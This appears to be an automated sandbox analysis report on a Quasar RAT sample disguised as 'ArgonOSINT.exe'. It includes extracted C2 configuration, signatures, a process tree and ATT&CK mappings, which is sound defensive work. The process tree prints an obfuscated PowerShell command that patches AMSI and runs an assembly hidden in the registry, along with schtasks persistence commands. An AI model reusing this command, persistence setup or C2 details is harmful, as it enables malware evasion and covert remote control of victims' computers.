Resubmissions

04-05-2024 05:10

240504-ft619aea3y 10

04-05-2024 05:06

240504-frlbrsdh81 10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240419-en
  • resource tags

    arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    04-05-2024 05:06

General

  • Target

    ArgonOSINT.exe

  • Size

    409KB

  • MD5

    c4f70954d48c8653fde31fc63c619fc8

  • SHA1

    c2fe0bc4eab66f6cbf19ab3a80817eba8084982e

  • SHA256

    dbc30b002dad39a45fdd36c509d854dc931662235886f01ec149cd8cf904ddb5

  • SHA512

    1a0db425192d25f1e96ac43a5ae18ff530ef11e2f1526fd6677f4b82b04e212679c347f5647be0d72665e2f587c2824b19d2104c48546eb049ae27fb7470defc

  • SSDEEP

    12288:UpyJcC+x6AoV5l+6KprKF/UV6u4W0pDs:kwd+mDsV6u4g

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

Slave

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-3vDee7FzoJnhqjuE3n

Attributes
  • encryption_key

    BfQu2aop09VkjugTkmuc

  • install_name

    $sxr-powershell.exe

  • log_directory

    Logs

  • reconnect_delay

    1000

  • startup_key

    $sxr-powershell

  • subdirectory

    Windows

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 9 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 8 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 55 IoCs
  • Modifies registry class 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 37 IoCs
  • Suspicious use of FindShellTrayWindow 13 IoCs
  • Suspicious use of SendNotifyMessage 14 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:652
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:552
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{39c212d9-bc40-4e32-8dc7-60a3b426bef0}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2016
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:708
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:1012
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:768
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
              1⤵
                PID:764
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1084
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                  1⤵
                    PID:1128
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                      PID:1160
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:wZeTAnaBqeJh{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EZyjtktkXGCjtl,[Parameter(Position=1)][Type]$xVUzvVptwL)$WSFlLdmVxgZ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'ef'+[Char](108)+'e'+[Char](99)+'t'+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+'e'+''+[Char](109)+''+'o'+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+'g'+'a'+'t'+'e'+''+[Char](84)+'y'+[Char](112)+''+[Char](101)+'',''+[Char](67)+'l'+'a'+''+[Char](115)+''+[Char](115)+',Pu'+[Char](98)+''+'l'+''+[Char](105)+''+'c'+','+[Char](83)+''+'e'+'al'+[Char](101)+'d'+','+''+'A'+''+'n'+'s'+[Char](105)+''+[Char](67)+''+'l'+''+'a'+'s'+[Char](115)+',A'+[Char](117)+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$WSFlLdmVxgZ.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+'i'+[Char](97)+''+[Char](108)+'N'+'a'+'m'+'e'+''+','+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'yS'+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$EZyjtktkXGCjtl).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+'t'+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$WSFlLdmVxgZ.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+'ke','P'+[Char](117)+'bl'+[Char](105)+'c'+[Char](44)+''+[Char](72)+''+[Char](105)+'de'+[Char](66)+''+[Char](121)+'S'+'i'+''+[Char](103)+''+[Char](44)+'N'+[Char](101)+''+[Char](119)+'S'+[Char](108)+'o'+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$xVUzvVptwL,$EZyjtktkXGCjtl).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+'t'+'i'+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $WSFlLdmVxgZ.CreateType();}$eFpAgkxDAslhC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'st'+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+'ic'+[Char](114)+'o'+[Char](115)+''+[Char](111)+'ft.'+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+'2'+'.'+[Char](85)+''+'n'+''+[Char](115)+''+[Char](97)+'f'+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+'v'+[Char](101)+'Me'+[Char](116)+''+[Char](104)+''+[Char](111)+'d'+'s'+'');$NpFZxJWYzcAdVi=$eFpAgkxDAslhC.GetMethod('G'+[Char](101)+''+[Char](116)+''+'P'+''+[Char](114)+''+'o'+'cA'+[Char](100)+''+[Char](100)+''+'r'+''+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+'P'+'ub'+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+'t'+''+'a'+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$CoxSzGYyOVbBWMmJPmJ=wZeTAnaBqeJh @([String])([IntPtr]);$BZkrLomjgLisRCTBebWJON=wZeTAnaBqeJh @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$OWpMlJPDvfk=$eFpAgkxDAslhC.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+''+'H'+''+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+'r'+''+[Char](110)+'e'+[Char](108)+''+'3'+''+[Char](50)+''+[Char](46)+''+'d'+'ll')));$eeyWnGmNcybqBV=$NpFZxJWYzcAdVi.Invoke($Null,@([Object]$OWpMlJPDvfk,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+'d'+''+'L'+'i'+[Char](98)+''+[Char](114)+'a'+[Char](114)+''+'y'+'A')));$fyNYSBMDjxSxFxXvp=$NpFZxJWYzcAdVi.Invoke($Null,@([Object]$OWpMlJPDvfk,[Object]('V'+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+'a'+'l'+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](116)+'e'+[Char](99)+''+'t'+'')));$aJOebLn=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($eeyWnGmNcybqBV,$CoxSzGYyOVbBWMmJPmJ).Invoke('am'+'s'+'i'+[Char](46)+''+[Char](100)+'ll');$PpykmwXSWpTGsCUsF=$NpFZxJWYzcAdVi.Invoke($Null,@([Object]$aJOebLn,[Object](''+[Char](65)+'ms'+'i'+''+'S'+''+[Char](99)+''+[Char](97)+''+'n'+''+'B'+''+[Char](117)+''+'f'+''+'f'+''+'e'+''+[Char](114)+'')));$rypVIhrgCY=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fyNYSBMDjxSxFxXvp,$BZkrLomjgLisRCTBebWJON).Invoke($PpykmwXSWpTGsCUsF,[uint32]8,4,[ref]$rypVIhrgCY);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$PpykmwXSWpTGsCUsF,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fyNYSBMDjxSxFxXvp,$BZkrLomjgLisRCTBebWJON).Invoke($PpykmwXSWpTGsCUsF,[uint32]8,0x20,[ref]$rypVIhrgCY);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+''+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue('$'+[Char](55)+''+'7'+''+'s'+'t'+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:4856
                        • C:\Windows\System32\Conhost.exe
                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          3⤵
                            PID:4156
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                        1⤵
                          PID:1228
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                          1⤵
                            PID:1292
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                            1⤵
                              PID:1304
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                              1⤵
                                PID:1408
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                1⤵
                                  PID:1456
                                  • C:\Windows\system32\sihost.exe
                                    sihost.exe
                                    2⤵
                                      PID:2976
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                    1⤵
                                    • Drops file in System32 directory
                                    PID:1576
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k NetworkService -p
                                    1⤵
                                      PID:1640
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                      1⤵
                                        PID:1668
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                        1⤵
                                          PID:1688
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                          1⤵
                                            PID:1760
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                            1⤵
                                              PID:1804
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                              1⤵
                                                PID:1864
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1896
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:2028
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:2036
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                      1⤵
                                                        PID:476
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                        1⤵
                                                          PID:1072
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:2116
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                              PID:2240
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                              1⤵
                                                                PID:2356
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                1⤵
                                                                  PID:2508
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                  1⤵
                                                                    PID:2516
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkService -p
                                                                    1⤵
                                                                      PID:2556
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                      1⤵
                                                                        PID:2588
                                                                      • C:\Windows\sysmon.exe
                                                                        C:\Windows\sysmon.exe
                                                                        1⤵
                                                                          PID:2644
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                          1⤵
                                                                            PID:2684
                                                                          • C:\Windows\System32\svchost.exe
                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                            1⤵
                                                                              PID:2692
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                              1⤵
                                                                                PID:2704
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                1⤵
                                                                                  PID:3028
                                                                                • C:\Windows\system32\wbem\unsecapp.exe
                                                                                  C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                  1⤵
                                                                                    PID:3080
                                                                                  • C:\Windows\Explorer.EXE
                                                                                    C:\Windows\Explorer.EXE
                                                                                    1⤵
                                                                                    • Modifies Internet Explorer settings
                                                                                    • Modifies registry class
                                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                    • Suspicious use of SendNotifyMessage
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    • Suspicious use of UnmapMainImage
                                                                                    PID:3280
                                                                                    • C:\Users\Admin\AppData\Local\Temp\ArgonOSINT.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\ArgonOSINT.exe"
                                                                                      2⤵
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:2524
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\ArgonOSINT.exe" /rl HIGHEST /f
                                                                                        3⤵
                                                                                        • Creates scheduled task(s)
                                                                                        PID:2484
                                                                                      • C:\Users\Admin\AppData\Roaming\Windows\$sxr-powershell.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\Windows\$sxr-powershell.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:4804
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\$sxr-powershell.exe" /rl HIGHEST /f
                                                                                          4⤵
                                                                                          • Creates scheduled task(s)
                                                                                          PID:1472
                                                                                      • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4868
                                                                                      • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                        "SCHTASKS.exe" /create /tn "$77ArgonOSINT.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\ArgonOSINT.exe'" /sc onlogon /rl HIGHEST
                                                                                        3⤵
                                                                                        • Creates scheduled task(s)
                                                                                        PID:4876
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                    1⤵
                                                                                      PID:3416
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                      1⤵
                                                                                        PID:3440
                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                        1⤵
                                                                                          PID:3784
                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                          1⤵
                                                                                          • Suspicious use of UnmapMainImage
                                                                                          PID:3840
                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                          1⤵
                                                                                            PID:3908
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
                                                                                            1⤵
                                                                                              PID:3952
                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                              C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                              1⤵
                                                                                                PID:4212
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
                                                                                                1⤵
                                                                                                  PID:4292
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                  1⤵
                                                                                                    PID:3656
                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                    1⤵
                                                                                                      PID:880
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                      1⤵
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:1096
                                                                                                    • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                      "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                      1⤵
                                                                                                      • Drops file in System32 directory
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:3796
                                                                                                    • C:\Windows\system32\SppExtComObj.exe
                                                                                                      C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:1416
                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                        C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                        1⤵
                                                                                                          PID:1744
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                          1⤵
                                                                                                            PID:3356
                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                            1⤵
                                                                                                              PID:2172
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                              1⤵
                                                                                                                PID:4880
                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                1⤵
                                                                                                                  PID:3600
                                                                                                                • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                  1⤵
                                                                                                                    PID:4208
                                                                                                                  • C:\Windows\ImmersiveControlPanel\SystemSettings.exe
                                                                                                                    "C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
                                                                                                                    1⤵
                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                    • Enumerates system info in registry
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                    PID:4660
                                                                                                                  • C:\Windows\system32\ApplicationFrameHost.exe
                                                                                                                    C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                                    1⤵
                                                                                                                    • Modifies registry class
                                                                                                                    PID:3940
                                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                    1⤵
                                                                                                                      PID:5008
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
                                                                                                                      1⤵
                                                                                                                        PID:1532
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc
                                                                                                                        1⤵
                                                                                                                          PID:452
                                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
                                                                                                                          1⤵
                                                                                                                            PID:1792

                                                                                                                          Network

                                                                                                                          MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                          Execution

                                                                                                                          Scheduled Task/Job

                                                                                                                          1
                                                                                                                          T1053

                                                                                                                          Persistence

                                                                                                                          Scheduled Task/Job

                                                                                                                          1
                                                                                                                          T1053

                                                                                                                          Privilege Escalation

                                                                                                                          Scheduled Task/Job

                                                                                                                          1
                                                                                                                          T1053

                                                                                                                          Defense Evasion

                                                                                                                          Modify Registry

                                                                                                                          1
                                                                                                                          T1112

                                                                                                                          Discovery

                                                                                                                          Query Registry

                                                                                                                          3
                                                                                                                          T1012

                                                                                                                          Peripheral Device Discovery

                                                                                                                          1
                                                                                                                          T1120

                                                                                                                          System Information Discovery

                                                                                                                          2
                                                                                                                          T1082

                                                                                                                          Command and Control

                                                                                                                          Web Service

                                                                                                                          1
                                                                                                                          T1102

                                                                                                                          Replay Monitor

                                                                                                                          Loading Replay Monitor...

                                                                                                                          Downloads

                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
                                                                                                                            Filesize

                                                                                                                            338B

                                                                                                                            MD5

                                                                                                                            574a4e46ab2792c118b920b67e29ae52

                                                                                                                            SHA1

                                                                                                                            ce441e7c2b4fc8158c45000fe687bc32f0ebb902

                                                                                                                            SHA256

                                                                                                                            ba5142c8abf0dd3beac6156352655ff10b00c562294ab4ee7f58a706d39bf1d2

                                                                                                                            SHA512

                                                                                                                            afb90106fa374aa9e185b63e801b6783377dac318b82ac8026bec6e71e251ea24f84e62a224fdcff29bca19365f19603646fcfc7aabcb8eb55b862cafd79e530

                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A
                                                                                                                            Filesize

                                                                                                                            412B

                                                                                                                            MD5

                                                                                                                            d604e313a7785d122ddbc295b969e7b8

                                                                                                                            SHA1

                                                                                                                            490cd477d23ce63a6a0562ca481754fb74b42fe3

                                                                                                                            SHA256

                                                                                                                            35a1b1919d2e5081033d3b10a682cd35571b08c0669406a6141e2d0377e0add2

                                                                                                                            SHA512

                                                                                                                            0fcc1268b44242ce3d3b65caeb05eb7266aa784e06ae31b6ce790360cb9aafbdf1cde27349ae351cdfaabeaa2043ad7286387c6b21a6739b8e4985534991a3b7

                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EAF8AA29A62AB29E614331747385D816_F9E4DC0B9D5C777357D7DB8DEF51118A
                                                                                                                            Filesize

                                                                                                                            404B

                                                                                                                            MD5

                                                                                                                            0442b0c5e809dbc161de47bee2189a31

                                                                                                                            SHA1

                                                                                                                            5cd127ca90269107ea38191bc97df7a9ec723411

                                                                                                                            SHA256

                                                                                                                            9b794252176cfb5539856de5760e08d25c838c692351e123ae6f0653d756aa66

                                                                                                                            SHA512

                                                                                                                            4ebecb99bafdaa4a50c38e1b4f599ca0f9b262e55933553ff7ad4875d737ce18ccf59462a758f45cc7383d193e85a587693e20875225b7abae1ccbfdaadc1185

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                                            Filesize

                                                                                                                            162KB

                                                                                                                            MD5

                                                                                                                            152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                                            SHA1

                                                                                                                            c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                                            SHA256

                                                                                                                            a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                                            SHA512

                                                                                                                            2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f18460fded109990.automaticDestinations-ms
                                                                                                                            Filesize

                                                                                                                            2KB

                                                                                                                            MD5

                                                                                                                            74bfc69e41663feabf72f917193129c9

                                                                                                                            SHA1

                                                                                                                            0eb423d8e00ce95616644254f905624b4ba478ab

                                                                                                                            SHA256

                                                                                                                            c49cf67f2e9438a4b17d3ffa0c7e7631181145c2233a0c5b106e272be745feff

                                                                                                                            SHA512

                                                                                                                            e8d04e587bbe7a2d2f6bc681b313ce0eb86e55733e680be64675de65f2a499b980d7df4e261e5d2f0ef2f5301275f77a1025e6c42ed265aefa93def6ed47bbd8

                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\f18460fded109990.customDestinations-ms
                                                                                                                            Filesize

                                                                                                                            24B

                                                                                                                            MD5

                                                                                                                            4fcb2a3ee025e4a10d21e1b154873fe2

                                                                                                                            SHA1

                                                                                                                            57658e2fa594b7d0b99d02e041d0f3418e58856b

                                                                                                                            SHA256

                                                                                                                            90bf6baa6f968a285f88620fbf91e1f5aa3e66e2bad50fd16f37913280ad8228

                                                                                                                            SHA512

                                                                                                                            4e85d48db8c0ee5c4dd4149ab01d33e4224456c3f3e3b0101544a5ca87a0d74b3ccd8c0509650008e2abed65efd1e140b1e65ae5215ab32de6f6a49c9d3ec3ff

